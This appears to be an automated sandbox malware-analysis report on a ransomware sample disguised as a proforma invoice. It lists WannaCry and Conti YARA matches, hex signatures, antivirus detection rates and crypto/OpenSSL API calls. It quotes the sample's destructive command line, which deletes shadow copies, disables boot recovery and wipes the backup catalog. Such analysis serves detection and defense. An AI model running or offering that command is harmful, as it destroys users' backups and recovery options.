  • 0x4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
  • 0x500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
Source: 0000000A.00000003.2298742785.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Author: Joe Security
Source: 0000003B.00000000.2402439775.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Author: Joe Security
Source: 0000000A.00000000.2272165012.000000000040E000.00000008.00000001.01000000.00000006.sdmp, Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
  • 0x14d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
  • 0x1500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
Source: Process Memory Space: Proforma Invoice and Bank swift-REG.PI-0086547654.exe PID: 3796, Rule: JoeSecurity_Conti_ransomware, Description: Yara detected Conti ransomware, Author: Joe Security

Source: 10.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.a48ba8.0.unpack, Rule: WanaCry, Description: WanaCry Payload, Author: kevoreilly
  • 0xd5c4:$exename: @WanaDecryptor@.exe
  • 0xd60c:$exename: @WanaDecryptor@.exe
  • 0xd8c0:$res: %08X.res
  • 0xd8b4:$pky: %08X.pky
  • 0xd8a8:$eky: %08X.eky
  • 0x5ba9:$taskstart: 8B 35 58 71 00 10 53 68 C0 D8 00 10 68 F0 DC 00 10 FF D6 83 C4 0C 53 68 B4 D8 00 10 68 24 DD 00 10 FF D6 83 C4 0C 53 68 A8 D8 00 10 68 58 DD 00 10 FF D6 53
Source: 10.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.10000000.1.unpack, Rule: WanaCry, Description: WanaCry Payload, Author: kevoreilly
  • 0xd5c4:$exename: @WanaDecryptor@.exe
  • 0xd60c:$exename: @WanaDecryptor@.exe
  • 0xd8c0:$res: %08X.res
  • 0xd8b4:$pky: %08X.pky
  • 0xd8a8:$eky: %08X.eky
  • 0x5ba9:$taskstart: 8B 35 58 71 00 10 53 68 C0 D8 00 10 68 F0 DC 00 10 FF D6 83 C4 0C 53 68 B4 D8 00 10 68 24 DD 00 10 FF D6 83 C4 0C 53 68 A8 D8 00 10 68 58 DD 00 10 FF D6 53
Source: 59.0.@WanaDecryptor@.exe.400000.0.unpack, Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Author: Joe Security
Source: 59.0.@WanaDecryptor@.exe.400000.0.unpack, Rule: Win32_Ransomware_WannaCry, Description: unknown, Author: ReversingLabs
  • 0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2
  • 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ...
  • 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
Source: 10.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.a48ba8.0.raw.unpack, Rule: WanaCry, Description: WanaCry Payload, Author: kevoreilly
  • 0xd5c4:$exename: @WanaDecryptor@.exe
  • 0xd60c:$exename: @WanaDecryptor@.exe
  • 0xd8c0:$res: %08X.res
  • 0xd8b4:$pky: %08X.pky
  • 0xd8a8:$eky: %08X.eky
  • 0x5ba9:$taskstart: 8B 35 58 71 00 10 53 68 C0 D8 00 10 68 F0 DC 00 10 FF D6 83 C4 0C 53 68 B4 D8 00 10 68 24 DD 00 10 FF D6 83 C4 0C 53 68 A8 D8 00 10 68 58 DD 00 10 FF D6 53

            Operating System Destruction

            Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, CommandLine: "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: @WanaDecryptor@.exe vs, ParentImage: C:\Users\user\Desktop\@WanaDecryptor@.exe, ParentProcessId: 6196, ParentProcessName: @WanaDecryptor@.exe, ProcessCommandLine: "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, ProcessId: 5720, ProcessName: cmd.exe
            No Snort rule has matched

            AV Detection

            Source: C:\Users\user\AppData\Local\@WanaDecryptor@.exe.lnk, Avira: detection malicious, Label: LNK/Runner.VPDJ
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, ReversingLabs: Detection: 96%
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Virustotal: Detection: 89%
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, ReversingLabs: Detection: 92%
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Virustotal: Detection: 94%
            Source: C:\Users\user\Desktop\taskdl.exe, ReversingLabs: Detection: 89%
            Source: C:\Users\user\Desktop\taskdl.exe, Virustotal: Detection: 88%
            Source: C:\Users\user\Desktop\taskse.exe, ReversingLabs: Detection: 86%
            Source: C:\Users\user\Desktop\taskse.exe, Virustotal: Detection: 88%
            Source: C:\Users\user\Desktop\u.wnry, ReversingLabs: Detection: 96%
            Source: C:\Users\user\Desktop\u.wnry, Virustotal: Detection: 89%
            Source: C:\Users\user\Documents\@WanaDecryptor@.exe, ReversingLabs: Detection: 96%
            Source: C:\Users\user\Documents\@WanaDecryptor@.exe, Virustotal: Detection: 89%
            Source: C:\Users\user\Downloads\@WanaDecryptor@.exe, ReversingLabs: Detection: 96%
            Source: C:\Users\user\Downloads\@WanaDecryptor@.exe, Virustotal: Detection: 89%
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Code function: 10_2_10003F00 GetFileAttributesA,GetFileAttributesA,CreateFileA,GetFileSize,GlobalAlloc,ReadFile,GetFileAttributesA,CryptImportKey,_local_unwind2,_local_unwind2,10_2_10003F00
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Code function: 10_2_10003C00 CryptDestroyKey,10_2_10003C00
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Code function: 10_2_10004040 CryptExportKey,GlobalAlloc,CryptExportKey,_local_unwind2,CreateFileA,WriteFile,_local_unwind2,10_2_10004040
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Code function: 10_2_10004350 CryptGenKey,10_2_10004350
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Code function: 10_2_10004170 CryptExportKey,CryptGetKeyParam,GlobalAlloc,CryptEncrypt,GlobalFree,10_2_10004170
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Code function: 10_2_10004370 EnterCriticalSection,CryptEncrypt,LeaveCriticalSection,LeaveCriticalSection,10_2_10004370
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Code function: 10_2_10003A80 GetFileAttributesA,GetFileAttributesA,CryptAcquireContextA,10_2_10003A80
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Code function: 10_2_10003BB0 GetFileAttributesA,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,10_2_10003BB0
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Code function: 10_2_10003AC0 CryptImportKey,CryptImportKey,CryptDestroyKey,10_2_10003AC0
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Code function: 10_2_10003D10 GetFileAttributesA,CryptEncrypt,_local_unwind2,CryptDecrypt,GetFileAttributesA,strncmp,_local_unwind2,10_2_10003D10
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Code function: 10_2_10004420 CryptGenRandom,10_2_10004420
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Code function: 10_2_10004440 CryptAcquireContextA,wcsrchr,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,10_2_10004440
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD9FD2C __stack_chk_fail,X509_STORE_CTX_init,ERR_put_error,X509_STORE_free,X509_STORE_CTX_set_flags,X509_verify_cert,X509_STORE_CTX_get1_chain,X509_STORE_CTX_cleanup,sk_pop_free,sk_shift,X509_free,X509_STORE_new,sk_num,sk_value,X509_STORE_add_cert,sk_num,X509_STORE_add_cert,ERR_peek_last_error,ERR_clear_error,sk_num,sk_num,sk_value,X509_check_purpose,sk_pop,X509_free,ERR_put_error,X509_STORE_CTX_get_error,X509_verify_cert_error_string,ERR_add_error_data,X509_STORE_CTX_cleanup,ERR_put_error,ERR_clear_error,ERR_peek_last_error,ERR_clear_error,__stack_chk_fail,X509_STORE_free,CRYPTO_add_lock,__stack_chk_fail,RAND_bytes,SSL_has_matching_session_id,__stack_chk_fail,86_2_6CD9FD2C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC37CE BUF_MEM_free,EVP_CIPHER_CTX_cleanup,CRYPTO_free,EVP_CIPHER_CTX_cleanup,CRYPTO_free,COMP_CTX_free,COMP_CTX_free,EVP_MD_CTX_destroy,EVP_MD_CTX_destroy,CRYPTO_free,SSL_SESSION_free,ERR_put_error,86_2_6CDC37CE
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC995C CRYPTO_add_lock,X509_NAME_free,86_2_6CDC995C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC7950 SSL_CTX_free,CRYPTO_add_lock,__stack_chk_fail,SSL_CTX_set_default_passwd_cb,86_2_6CDC7950
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCE952 ERR_put_error,CRYPTO_add_lock,BUF_strdup,86_2_6CDCE952
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDBA97C pqueue_free,pqueue_free,pqueue_free,pqueue_free,pqueue_free,CRYPTO_free,86_2_6CDBA97C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB3970 SSL_get_sigalgs,OBJ_find_sigid_by_algs,__stack_chk_fail,SSL_get_shared_sigalgs,__stack_chk_fail,CRYPTO_malloc,RAND_bytes,CRYPTO_free,CRYPTO_free,CRYPTO_free,86_2_6CDB3970
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCE972 ERR_put_error,CRYPTO_add_lock,86_2_6CDCE972
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC0969 pqueue_peek,pqueue_pop,CRYPTO_free,CRYPTO_free,CRYPTO_free,pitem_free,86_2_6CDC0969
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC6964 sk_zero,CRYPTO_free,BUF_memdup,sk_push,ERR_put_error,sk_new_null,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,sk_free,86_2_6CDC6964
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCB190 CRYPTO_malloc,RSA_up_ref,DHparams_dup,BN_dup,BN_dup,EC_KEY_dup,CRYPTO_add_lock,CRYPTO_add_lock,X509_chain_up_ref,CRYPTO_malloc,EVP_sha1,EVP_sha1,EVP_sha1,EVP_sha1,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_add_lock,CRYPTO_add_lock,ERR_put_error,RSA_free,DH_free,EC_KEY_free,X509_free,EVP_PKEY_free,sk_pop_free,CRYPTO_free,ERR_put_error,ERR_put_error,__stack_chk_fail,86_2_6CDCB190
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCE912 ERR_put_error,CRYPTO_add_lock,BUF_strdup,86_2_6CDCE912
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCD90C X509_STORE_free,CRYPTO_add_lock,86_2_6CDCD90C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC1907 CRYPTO_free,CRYPTO_free,CRYPTO_free,86_2_6CDC1907
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCA930 SSL_use_psk_identity_hint,strlen,CRYPTO_free,BUF_strdup,ERR_put_error,CRYPTO_free,__stack_chk_fail,SSL_get_psk_identity_hint,__stack_chk_fail,SSL_get_psk_identity,__stack_chk_fail,SSL_set_psk_client_callback,__stack_chk_fail,86_2_6CDCA930
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC6930 ERR_put_error,__stack_chk_fail,SSL_get_servername,__stack_chk_fail,SSL_get_servername_type,__stack_chk_fail,SSL_select_next_proto,__stack_chk_fail,SSL_get0_next_proto_negotiated,__stack_chk_fail,SSL_CTX_set_next_protos_advertised_cb,__stack_chk_fail,SSL_CTX_set_next_proto_select_cb,__stack_chk_fail,SSL_CTX_set_alpn_protos,CRYPTO_malloc,__stack_chk_fail,SSL_set_alpn_protos,CRYPTO_malloc,__stack_chk_fail,SSL_CTX_set_alpn_select_cb,__stack_chk_fail,SSL_get0_alpn_selected,__stack_chk_fail,SSL_export_keying_material,__stack_chk_fail,SSL_CTX_new,SSL_get_ex_data_X509_STORE_CTX_idx,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,SSL_CTX_free,__stack_chk_fail,SSL_CTX_set_default_passwd_cb,__stack_chk_fail,SSL_CTX_set_default_passwd_cb_userdata,__stack_chk_fail,SSL_CTX_set_cert_verify_callback,__stack_chk_fail,SSL_CTX_set_verify,__stack_chk_fail,SSL_CTX_set_verify_depth,__stack_chk_fail,SSL_CTX_set_cert_cb,__stack_chk_fail,SSL_set_cert_cb,__stack_chk_fail,86_2_6CDC6930
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCB932 ERR_put_error,RSA_free,DH_free,EC_KEY_free,X509_free,EVP_PKEY_free,sk_pop_free,CRYPTO_free,86_2_6CDCB932
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCE932 ERR_put_error,CRYPTO_add_lock,BUF_strdup,86_2_6CDCE932
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB2922 CRYPTO_free,CRYPTO_malloc,86_2_6CDB2922
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB6290 EVP_CIPHER_key_length,EVP_CIPHER_iv_length,CRYPTO_malloc,CRYPTO_malloc,OPENSSL_cleanse,CRYPTO_free,ERR_put_error,ERR_put_error,__stack_chk_fail,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_cipher,memmove,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_cipher,EVP_CIPHER_block_size,EVP_CIPHER_flags,EVP_CIPHER_CTX_ctrl,EVP_Cipher,EVP_CIPHER_flags,EVP_CIPHER_flags,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_flags,EVP_CIPHER_iv_length,_iob,fprintf,OpenSSLDie,OpenSSLDie,RAND_bytes,__stack_chk_fail,EVP_MD_CTX_md,EVP_MD_type,ERR_put_error,EVP_MD_CTX_init,EVP_MD_CTX_copy_ex,EVP_DigestFinal_ex,EVP_MD_CTX_cleanup,__stack_chk_fail,EVP_MD_CTX_init,EVP_MD_size,EVP_MD_CTX_copy_ex,EVP_MD_CTX_cleanup,OPENSSL_cleanse,OPENSSL_cleanse,ERR_put_error,EVP_MD_CTX_cleanup,OPENSSL_cleanse,OPENSSL_cleanse,ERR_put_error,EVP_DigestFinal_ex,__stack_chk_fail,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_flags,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestSignFinal,EVP_MD_CTX_copy,EVP_MD_CTX_cleanup,EVP_MD_CTX_cleanup,OpenSSLDie,__stack_chk_fail,ERR_put_error,OPENSSL_cleanse,ERR_put_error,__stack_chk_fail,CRYPTO_malloc,CRYPTO_malloc,memcmp,memcmp,memcmp,ERR_put_error,CRYPTO_free,CRYPTO_free,ERR_put_error,CRYPTO_free,memcmp,OPENSSL_cleanse,OPENSSL_cleanse,ERR_put_error,__stack_chk_fail,__stack_chk_fail,86_2_6CDB6290
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCBAE0 CRYPTO_add_lock,__stack_chk_fail,86_2_6CDCBAE0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDDEA97 strlen,OPENSSL_cleanse,CRYPTO_free,BN_clear_free,BN_clear_free,BN_clear_free,86_2_6CDDEA97
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA2A81 BIO_free,EVP_MD_CTX_destroy,CRYPTO_free,BIO_s_mem,BIO_new,BIO_ctrl,86_2_6CDA2A81
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCEA80 SSL_CTX_add_session,CRYPTO_add_lock,CRYPTO_lock,lh_insert,CRYPTO_add_lock,SSL_CTX_ctrl,SSL_CTX_ctrl,SSL_CTX_ctrl,lh_retrieve,CRYPTO_add_lock,CRYPTO_lock,lh_delete,CRYPTO_add_lock,lh_retrieve,__stack_chk_fail,86_2_6CDCEA80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD9FAB0 __stack_chk_fail,CRYPTO_malloc,CRYPTO_free,86_2_6CD9FAB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD0A69 CRYPTO_free,86_2_6CDD0A69
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDBAA60 pitem_free,pqueue_pop,__stack_chk_fail,pqueue_free,pqueue_free,pqueue_free,pqueue_free,pqueue_free,CRYPTO_free,__stack_chk_fail,SSL_ctrl,__stack_chk_fail,__stack_chk_fail,86_2_6CDBAA60
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDDE880 SRP_generate_client_master_secret,SRP_Verify_B_mod_N,SRP_Calc_u,SRP_Calc_x,SRP_Calc_client_key,BN_num_bits,CRYPTO_malloc,BN_bn2bin,OPENSSL_cleanse,CRYPTO_free,BN_clear_free,BN_clear_free,strlen,OPENSSL_cleanse,CRYPTO_free,BN_clear_free,BN_clear_free,BN_clear_free,BN_clear_free,BN_clear_free,__stack_chk_fail,86_2_6CDDE880
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB2A02 CRYPTO_free,CRYPTO_malloc,86_2_6CDB2A02
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDACBF9 CRYPTO_free,86_2_6CDACBF9
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDDCBE0 SSL_set_bio,CRYPTO_add_lock,86_2_6CDDCBE0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA8B90 EVP_CIPHER_flags,CRYPTO_memcmp,__stack_chk_fail,86_2_6CDA8B90
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB1E60 CRYPTO_free,CRYPTO_malloc,__stack_chk_fail,86_2_6CDB1E60
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDBCB95 pqueue_peek,pqueue_pop,CRYPTO_free,CRYPTO_free,pitem_free,86_2_6CDBCB95
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB0C09 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_malloc,strlen,strlen,SSL_get_srtp_profiles,strncmp,CRYPTO_malloc,strlen,ERR_put_error,CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,sk_pop_free,sk_new_null,sk_push,d2i_OCSP_RESPID,sk_pop_free,d2i_X509_EXTENSIONS,__stack_chk_fail,CRYPTO_free,CRYPTO_malloc,OCSP_RESPID_free,OCSP_RESPID_free,86_2_6CDB0C09
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA2B51 EVP_MD_CTX_destroy,CRYPTO_free,86_2_6CDA2B51
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDACB40 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,__stack_chk_fail,86_2_6CDACB40
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDADB40 ERR_put_error,__stack_chk_fail,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,__stack_chk_fail,CONF_parse_list,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,__stack_chk_fail,EC_KEY_get0_group,EC_GROUP_method_of,EC_METHOD_get_field_type,EC_GROUP_get_curve_name,ERR_put_error,EC_GROUP_get_curve_name,__stack_chk_fail,86_2_6CDADB40
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCBB42 RSA_free,DH_free,EC_KEY_free,X509_free,EVP_PKEY_free,sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_free,__stack_chk_fail,86_2_6CDCBB42
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDDCB69 SSL_get_rbio,BIO_push,CRYPTO_add_lock,86_2_6CDDCB69
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCF870 SSL_set_session,SSL_set_ssl_method,CRYPTO_add_lock,CRYPTO_add_lock,CRYPTO_add_lock,SSL_set_ssl_method,ERR_put_error,__stack_chk_fail,SSL_SESSION_set_timeout,__stack_chk_fail,SSL_SESSION_get_timeout,__stack_chk_fail,SSL_SESSION_get_time,__stack_chk_fail,SSL_SESSION_set_time,__stack_chk_fail,SSL_SESSION_get0_peer,__stack_chk_fail,SSL_SESSION_set1_id_context,ERR_put_error,__stack_chk_fail,SSL_CTX_set_timeout,__stack_chk_fail,SSL_CTX_get_timeout,__stack_chk_fail,SSL_set_session_secret_cb,__stack_chk_fail,SSL_set_session_ticket_ext_cb,__stack_chk_fail,SSL_set_session_ticket_ext,CRYPTO_free,CRYPTO_malloc,ERR_put_error,__stack_chk_fail,86_2_6CDCF870
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB7B3C CRYPTO_free,CRYPTO_free,memcmp,OPENSSL_cleanse,OPENSSL_cleanse,86_2_6CDB7B3C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD99B30 CRYPTO_free,CRYPTO_malloc,EVP_sha256,EVP_Digest,SSL_SESSION_free,SSL_CTX_remove_session,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,86_2_6CD99B30
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC3B30 SSL_new,CRYPTO_malloc,CRYPTO_add_lock,ERR_put_error,ERR_put_error,ERR_put_error,86_2_6CDC3B30
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD98B20 ERR_put_error,sk_new_null,sk_push,d2i_X509,ERR_put_error,ERR_put_error,ERR_clear_error,sk_value,X509_get_pubkey,X509_free,ERR_put_error,ERR_put_error,ERR_put_error,EVP_PKEY_missing_parameters,ERR_put_error,ERR_put_error,ERR_put_error,CRYPTO_add_lock,X509_free,X509_free,CRYPTO_add_lock,__stack_chk_fail,86_2_6CD98B20
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA5070 ERR_put_error,__stack_chk_fail,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_flags,EVP_CIPHER_CTX_flags,CRYPTO_memcmp,ERR_put_error,COMP_expand_block,ERR_put_error,ERR_put_error,OpenSSLDie,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,SSL_state,ERR_put_error,ERR_put_error,ERR_put_error,SSL_state,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,86_2_6CDA5070
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA04CC CRYPTO_free,CRYPTO_malloc,86_2_6CDA04CC
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD24EC CRYPTO_malloc,CRYPTO_free,sk_new_null,CRYPTO_free,sk_dup,sk_free,sk_free,sk_set_cmp_func,sk_sort,86_2_6CDD24EC
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCA4E0 SSL_CTX_get_ex_new_index,CRYPTO_get_ex_new_index,86_2_6CDCA4E0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCC480 CRYPTO_add_lock,sk_pop_free,X509_free,RSA_free,DH_free,EC_KEY_free,__stack_chk_fail,__stack_chk_fail,86_2_6CDCC480
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB1485 CRYPTO_malloc,strlen,86_2_6CDB1485
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCA4A0 SSL_get_ex_data,CRYPTO_get_ex_data,86_2_6CDCA4A0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC445C CRYPTO_lock,lh_retrieve,CRYPTO_lock,86_2_6CDC445C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA8450 CRYPTO_lock,CRYPTO_lock,CRYPTO_free,CRYPTO_lock,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,86_2_6CDA8450
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC3450 X509_VERIFY_PARAM_free,CRYPTO_free_ex_data,BIO_free,BIO_free_all,BIO_free_all,BUF_MEM_free,sk_free,sk_free,SSL_SESSION_free,EVP_CIPHER_CTX_cleanup,CRYPTO_free,EVP_CIPHER_CTX_cleanup,CRYPTO_free,COMP_CTX_free,COMP_CTX_free,EVP_MD_CTX_destroy,EVP_MD_CTX_destroy,CRYPTO_free,CRYPTO_add_lock,CRYPTO_free,CRYPTO_free,CRYPTO_free,sk_pop_free,sk_pop_free,CRYPTO_free,CRYPTO_free,sk_pop_free,CRYPTO_add_lock,CRYPTO_free,sk_free,CRYPTO_free,BIO_pop,__stack_chk_fail,86_2_6CDC3450
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCA450 SSL_set_ex_data,CRYPTO_set_ex_data,86_2_6CDCA450
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD2452 CRYPTO_malloc,CRYPTO_free,sk_new_null,CRYPTO_free,sk_dup,sk_free,sk_free,sk_set_cmp_func,sk_sort,86_2_6CDD2452
